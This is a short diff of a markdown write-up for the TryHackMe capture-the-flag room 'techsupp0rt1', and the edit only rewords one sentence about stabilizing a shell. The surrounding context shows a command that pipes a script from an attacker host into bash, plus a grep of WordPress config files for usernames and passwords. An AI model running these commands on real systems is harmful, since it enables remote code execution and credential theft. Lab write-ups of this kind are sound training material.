n3ird4/TryHackMe/ctf/techsupp0rt1.md

 curl attacker_ip:8000/lol.sh | bash
 ```

-Ok so after stabilizing it I was able to start investagting in a more "convenient" way:
+And after stabilizing it I was able to start investagting in a more "convenient" way:

 ```bash
 /var/www/html/wordpress$ grep -iE 'user|pass' wp-con*